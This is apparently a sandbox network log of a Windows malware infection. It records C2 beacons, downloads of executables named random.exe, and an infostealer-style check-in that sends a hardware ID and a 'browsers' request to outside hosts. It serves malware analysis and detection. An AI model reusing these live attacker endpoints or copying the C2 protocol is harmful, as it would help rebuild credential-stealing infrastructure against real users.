Dec 19, 2024 10:10:07.692070961 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 19, 2024 10:10:09.057771921 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:10:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 35 35 35 0d 0a 20 3c 63 3e 31 30 31 37 34 37 37 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 37 34 37 38 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 31 37 34 37 39 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 63 66 37 62 38 63 37 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 37 34 38 30 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 [TRUNCATED] Data Ascii: 555 <c>1017477001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1017478001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1017479001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1017480001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#1017481001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#1017482001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbd32c86444db31cf64d4a485a9592e100b7#1017483001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcc7a9d5143a65ae003564d5b9cd3e956b7b5d1#1017484001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc67e805545b01cf64d4a485a9592e100b7#1017485001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb00ab5e45425197d1aa1daaa8#1017486001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc7709e5b03ac52ea484b411b9dc4e1#1017487001+++b5937c1a99d5f9df0b5dafc850 [TRUNCATED]
Dec 19, 2024 10:10:09.057842970 CET	124	IN	Data Raw: 62 34 31 31 62 39 64 63 34 65 31 23 31 30 31 37 34 38 38 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 37 65 38 Data Ascii: b411b9dc4e1#1017488001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1017489001+++b59
Dec 19, 2024 10:10:09.292747021 CET	196	IN	Data Raw: 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 37 37 30 39 63 34 35 34 33 62 30 31 63 66 36 34 64 34 61 34 38 35 61 39 35 39 32 65 31 30 30 62 Data Ascii: 37c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc7709c4543b01cf64d4a485a9592e100b7#1017490001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49860	185.215.113.16	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:09.417787075 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 19, 2024 10:10:10.760162115 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:10:09 GMT Content-Type: application/octet-stream Content-Length: 1801728 Last-Modified: Thu, 19 Dec 2024 08:27:33 GMT Connection: keep-alive ETag: "6763d8f5-1b7e00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 b0 00 00 00 00 00 00 00 60 47 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 47 00 00 04 00 00 26 7b 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_g`G@G&{@T0h 1 H@.rsrc X@.idata 0\@ )@^@hraxhminP.`@dhruiwutPGX@.taggant0`G"\@
Dec 19, 2024 10:10:10.760237932 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:10:10.760276079 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:10:10.760312080 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:10:10.760349035 CET	1236	IN	Data Raw: ba 8c 35 66 0f 9d b8 a2 ed 73 54 c2 0d 53 22 ca 42 e3 99 be a7 0c bd 47 67 20 d0 75 87 e2 8e ed d2 bc 1f 3d 11 78 b8 05 96 2c 90 bf ff 94 5c 34 25 63 b9 85 9f a5 8e e3 3d 33 52 d6 5c 5b 56 eb ff 6e a7 d4 91 ea 03 f4 58 f9 16 01 81 81 04 41 4c 88 Data Ascii: 5fsTS"BGg u=x,\4%c=3R\[VnXAL@YIS~JA>Xpj6htZDgg9!u^LUORh\|M!\|v%a?Bn7wADj^0D)a.Q!iZVW<-69
Dec 19, 2024 10:10:10.760405064 CET	1236	IN	Data Raw: 17 32 72 02 4d 42 97 69 a7 61 8f 83 31 1a da 2b 72 44 b3 e2 da 80 f8 ed 98 42 d3 c0 cb a8 98 49 bf 16 7b 39 59 70 e4 b0 1b c4 51 c2 86 eb b6 c4 82 44 52 f5 94 00 5c a9 c9 34 1e 6c c4 9a eb d6 5c 2c 6f f0 b7 66 21 63 66 90 b9 d6 3e 7c 52 4a 77 d4 Data Ascii: 2rMBia1+rDBI{9YpQDR\4l\,of!cf>\|RJwWIdIF\|ECuX{q?1O5H Acm,roCI])I.C{~`jB\|%bd`AfjTT5MDuLn/bf.eGCT9A0
Dec 19, 2024 10:10:10.760442019 CET	1236	IN	Data Raw: cd c2 10 0e 8d d8 be 66 4c 8d a4 be 6f 2c 51 1e 66 24 0a cc 16 03 0b 23 bf 09 6a 08 96 5d d5 2b 58 e7 10 45 6d e1 42 da ef 0d 9e 3f 24 a0 ef ce 80 d9 56 10 e6 93 3e 49 a5 65 4c 36 8f 04 79 4f ae c4 3a 34 4d a4 0a cc 6b 92 d3 15 6e 01 0e 8c 93 6f Data Ascii: fLo,Qf$#j]+XEmB?$V>IeL6yO:4MknoWp+m}{JiLm]>T@uj8\|5izrwjG5I#C)Qr]6Oq*Q,(nzb=,Amm4^.ty\|ZCV] g,/0
Dec 19, 2024 10:10:10.760478973 CET	1236	IN	Data Raw: 86 76 f0 02 95 fb a1 2b 12 6b fc 3f 45 15 44 87 9e 2e be a5 3f dd 92 03 d0 23 26 32 09 f0 a9 67 3a 77 ef 5a 59 ac 86 a2 2a 68 9a b9 47 03 9d c2 40 88 b8 0e b3 0a 19 e5 ab 6a 57 3b 75 9c f2 1d 46 84 bd 45 7f 8f 68 cb 14 ce 04 29 89 54 52 94 4c 66 Data Ascii: v+k?ED.?#&2g:wZYhG@jW;uFEh)TRLf",F>[$yLG`~9D\Wv3j8TmLVLq,c4QT4!/` kiu2)v7UaU?$Qu,ITVFDQDf{L
Dec 19, 2024 10:10:10.760515928 CET	1236	IN	Data Raw: 9c 13 14 a9 56 66 e6 f4 56 1e c7 cb 47 02 56 6f 6f 5a f7 d4 bc 4b 99 99 06 70 92 10 4f 33 91 d5 fd 70 94 7f d5 9f c2 3e 7f 5c 2a e3 68 4a 0a cc c1 7e ca c2 b6 f2 10 5e 19 e4 4f 47 5a db 28 b5 53 58 85 99 b2 17 0e 01 7f 73 0e ca 41 3e 5c 3b 1e ba Data Ascii: VfVGVooZKpO3p>\hJ~^OGZ(SXsA>\;9Zt>v]&XZ9@Bw1ieu797>Y]zJ-Q}tz^p)G?>;Tp),HFRb-n\]+:p%S2+Hh82
Dec 19, 2024 10:10:10.760554075 CET	1236	IN	Data Raw: 3c 64 53 c5 f8 0a 50 0b 99 0d 84 7f da 25 de 09 16 09 f6 38 fd cd ad 2f 19 dd f5 d8 56 f3 2b ff 4c 93 4f af 17 0b 48 1a b3 23 fe 8d 91 c3 0a f3 96 43 2c 99 08 b4 08 99 80 e4 f8 88 56 72 c2 47 fe a4 27 18 ac be f0 e6 78 74 e9 d5 3c 8a f5 3c 2e b0 Data Ascii: <dSP%8/V+LOH#C,VrG'xt<<.W%}o$d)+<WU*ZIe+uoHJDj4<WqLijMyM?s}CB-sz#5"'(\adv%_xDc?0
Dec 19, 2024 10:10:10.880882025 CET	1236	IN	Data Raw: f9 a6 a4 e2 3c b3 5a 46 d0 00 60 13 07 5d c9 93 5c 74 93 84 3a 5e cf e4 14 75 d7 32 a6 5a 2f 2e 49 a2 2d 3f a7 6e 47 05 7f 11 0f 40 4e c4 0f 35 b5 c9 01 0e a5 d4 81 4a a0 3f b7 fa 02 ec ce 90 d5 e0 86 a0 2f a4 ca 2f 97 d6 0f c7 7f 95 a8 e8 48 49 Data Ascii: <ZF`]\t:^u2Z/.I-?nG@N5J?//HI),pAASa@N;W(Y)jM}u`i!DO7V)#G@AbP)G6/\|FoDY&P IUTa[.tg7.?Mx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49879	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:16.223800898 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017477001&unit=246122658369
Dec 19, 2024 10:10:17.559161901 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:10:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49881	185.215.113.16	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:17.688353062 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 19, 2024 10:10:19.031708002 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:10:18 GMT Content-Type: application/octet-stream Content-Length: 2928640 Last-Modified: Thu, 19 Dec 2024 08:27:44 GMT Connection: keep-alive ETag: "6763d900-2cb000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 e0 4f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 50 00 00 04 00 00 52 61 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg(O@PRa-@M$a$$ $h@.rsrc$x@.idata $z@assqlaww+$+\|@blchljdgO,@.taggant0O",@
Dec 19, 2024 10:10:19.031800032 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:10:19.031835079 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:10:19.031872034 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:10:19.031909943 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:10:19.031946898 CET	1236	IN	Data Raw: 8b ad 6d 0f e8 20 6c 48 45 33 a0 51 89 1b ad e3 31 56 b3 a1 cb 36 1d b0 94 1c 5b e3 b9 f3 8d f3 81 b7 80 9d 9c f9 1b 0e 32 b3 01 63 8c 06 82 b1 4d 36 21 8a fb 25 8c d6 82 34 c6 bc 0c f7 45 da 6e 2f a0 7c e9 6e 71 3c b7 5d 36 2c 90 7b 5f af 84 00 Data Ascii: m lHE3Q1V6[2cM6!%4En/\|nq<]6,{_o~M,L=,l3J`>y`qhAV"syv,qp+HI<nMyZ=TK1J&_clKH]N\ZiYWpqO?\LK
Dec 19, 2024 10:10:19.031985044 CET	1236	IN	Data Raw: e4 d0 87 cd a8 c6 d6 6b 25 93 b1 41 3f 2e b9 41 cc 32 f6 7e d5 90 67 31 48 c3 10 bc b8 33 56 16 1a 8c e7 78 a5 81 73 57 9f e6 49 7f 99 4a d5 22 2e 06 f0 a5 58 32 9e 22 d7 26 78 3e be 95 dd fa 48 8c 80 b0 57 3e f6 65 d5 67 f1 e9 ed 1c ab ba 5c ae Data Ascii: k%A?.A2~g1H3VxsWIJ".X2"&x>HW>eg\xF-1<LBB!206X%p\|,5vI-1rE #yC\| u>Nhs-->7aEVE2/`j2i8eK9y-
Dec 19, 2024 10:10:19.032329082 CET	1236	IN	Data Raw: 0d bc b6 01 a8 e4 60 25 a6 31 ca f9 01 f6 21 b1 45 a7 8b 74 93 24 1a 3a e6 f6 5d 33 a3 41 cb ad 8b 81 b0 a8 f1 24 22 3a 0d 1a 6e b5 fe 75 9a f0 4c f6 72 09 54 50 c8 ab d0 1b 90 36 9e af 69 d9 db 1d ae 52 b5 1b 81 79 f3 72 d0 b2 26 c0 13 3b 0d 3f Data Ascii: `%1!Et$:]3A$":nuLrTP6iRyr&;?64L2M3f=cM/m2N!JhfZnB5B,1jR\|y'*fYM,=VX]4}"b5xyus,dHH6l}Af%#h]UdX^kLAHr}
Dec 19, 2024 10:10:19.032341003 CET	1236	IN	Data Raw: c5 ab 63 c5 97 45 80 99 cd 22 b0 e1 94 f4 eb 9f e3 b0 f5 29 92 e4 39 a9 89 f0 8c 39 25 49 2f b9 61 11 8d 3d 06 22 6a 36 0d c1 6b a1 ca ec 12 ac 5d 2c 9e 7d 0f d3 16 96 e6 2c be 3d 48 3c c6 1d 94 f6 e1 a0 21 20 9a 95 a4 ff 89 71 55 bc 64 f5 01 f6 Data Ascii: cE")99%I/a="j6k],},=H<! qUdZ.]%c\|#pn\|~,~=H]AIG",Lj'"$>"$f%ZV8X$&:ZoOQwl<p}G0DE$6kaV=^:?=A<w4d%
Dec 19, 2024 10:10:19.032377005 CET	1236	IN	Data Raw: 8c 40 b2 83 01 b4 64 f1 0e ab 08 b9 b5 c3 fa 20 94 70 6a cd 24 48 e6 b8 69 39 93 83 a5 22 90 99 0f f6 bb 79 99 4c 3a ac a7 2c 7d 9f f9 ac 44 b9 19 8b 50 aa ba 4f 96 bd 9c b4 eb 79 4a c8 90 7d ba 50 68 ab 19 49 63 88 51 2a b2 20 94 e0 6a ec 0e 26 Data Ascii: @d pj$Hi9"yL:,}DPOyJ}PhIcQ* j&j}y3'V@^j(#fGjh$`P, eVpi1;zE"~dqLjRt\SDq@$9Kd`0D>6n%J
Dec 19, 2024 10:10:19.152168989 CET	1236	IN	Data Raw: a9 03 f5 f2 2e 80 e1 9f ad 74 5e a3 41 50 4a 52 5d 9b ef 2d aa 23 90 8d a3 d5 2e 77 40 f6 6a ab a1 2c 87 ab 95 10 ea d1 41 48 97 b7 f5 a8 64 b1 19 b0 16 38 50 22 99 22 b6 de b9 a6 52 42 a0 04 e2 b4 5f b5 56 e2 33 8d 99 c4 16 7a 52 7f d0 58 fa 62 Data Ascii: .t^APJR]-#.w@j,AHd8P""RB_V3zRXb>;rF'd\\|rv8;,LyouM!H(RYE ?C{(DnSS\X9S-vK5r`PL>Wcu'(<YpKbL:yub>yj,[Eht

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49904	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:27.036595106 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017478001&unit=246122658369
Dec 19, 2024 10:10:28.371663094 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:10:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49909	185.215.113.206	80	4132	C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:28.157758951 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 19, 2024 10:10:29.508976936 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:10:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 19, 2024 10:10:29.522423029 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGCAAAFCBFBAKFHJDBKJ Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 35 46 35 46 37 36 31 34 43 32 38 31 37 30 31 38 37 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 2d 2d 0d 0a Data Ascii: ------DGCAAAFCBFBAKFHJDBKJContent-Disposition: form-data; name="hwid"F255F5F7614C2817018708------DGCAAAFCBFBAKFHJDBKJContent-Disposition: form-data; name="build"stok------DGCAAAFCBFBAKFHJDBKJ--
Dec 19, 2024 10:10:30.112386942 CET	407	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:10:29 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4f 44 4e 68 4d 57 56 6a 4e 7a 59 77 4e 6a 4a 6a 5a 6a 45 30 4f 54 45 31 59 57 45 32 5a 57 46 6b 4f 57 4e 69 4d 6a 63 77 4e 6a 41 32 4f 47 4a 6c 4f 47 59 78 4e 32 49 7a 59 7a 64 69 4e 54 67 77 4e 47 5a 69 5a 54 6b 31 4f 47 45 79 5a 6a 46 6c 5a 44 49 31 59 6a 4a 69 4d 6d 49 34 4d 44 52 6d 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: ODNhMWVjNzYwNjJjZjE0OTE1YWE2ZWFkOWNiMjcwNjA2OGJlOGYxN2IzYzdiNTgwNGZiZTk1OGEyZjFlZDI1YjJiMmI4MDRmfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Dec 19, 2024 10:10:30.113876104 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGH Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="message"browsers------AECAECFCAAEBFHIEHDGH--
